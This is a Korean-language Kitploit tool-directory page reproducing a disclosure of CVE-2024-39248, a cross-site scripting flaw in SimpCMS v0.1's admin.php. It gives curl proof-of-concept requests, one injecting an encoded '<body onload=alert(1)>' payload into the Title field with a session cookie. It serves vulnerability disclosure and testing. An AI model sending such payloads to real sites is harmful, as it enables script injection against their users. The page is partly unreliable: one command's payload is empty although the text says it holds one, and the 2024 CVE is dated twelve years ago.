Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-39248 — SimpCMS v0.1에서의 교차 사이트 스크립팅(XSS)에 관한 게시물 - /SimpCMS/admin.php | Kitploit
도구/GitHubGitHub/jasonthename/cve-2024-39248
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubjasonthename/cve-2024-39248

CVE-2024-39248

SimpCMS v0.1에서의 교차 사이트 스크립팅(XSS)에 관한 게시물 - /SimpCMS/admin.php

저장소 보기
12년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Exploit Title: SimpCMS v0.1 - 크로스 사이트 스크립팅 (XSS)

CVE: CVE-2024-39248

Exploit Author: Jason Jacobs (0xjason_jacobs - Twitter)

Vendor Homepage: https://sourceforge.net/projects/simpcms/

Vulnerable endpoint: /SimpCMS/admin.php

SimpCMS v0.1의 크로스 사이트 스크립팅(XSS) 취약점으로 인해 공격자가 /admin.php의 Title 필드에 삽입된 조작된 페이로드를 통해 임의의 웹 스크립트나 HTML을 실행할 수 있습니다.

SourceForge에서 제공 중인 SimpCMS 버전에 대한 업데이트된 cURL 명령 매개변수:

SimpCMS의 관리자 인터페이스에 로그인한 후, 브라우저 검사 요소의 Application 탭에서 확인한 각자의 Cookie 값을 복사하여 다음 curl 요청을 제출하십시오:

curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"

command

poc

초기 CVE 제출 시의 매개변수 (동일한 익스플로잇이 작동함):

SimpCMS 소프트웨어에서 확인된 초기 매개변수는 다음 cURL 명령어로 이어졌지만 나중에 업데이트되었습니다:

curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"

설명:

  • curl: URL로 데이터를 전송하는 명령줄 도구입니다.
  • -X POST: 사용할 요청 메서드를 지정합니다 (POST).
  • "http://site.com/SimpCMS/admin.php": 요청이 전송되는 URL입니다.
  • -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - POST 요청 페이로드입니다.

이 명령을 터미널에서 실행하여 XSS 페이로드가 포함된 POST 요청을 보내십시오. /SimpCMS 메인 사이트를 방문하면 XSS가 표시됩니다.

CWE: https://cwe.mitre.org/data/definitions/79.html

도구 다운로드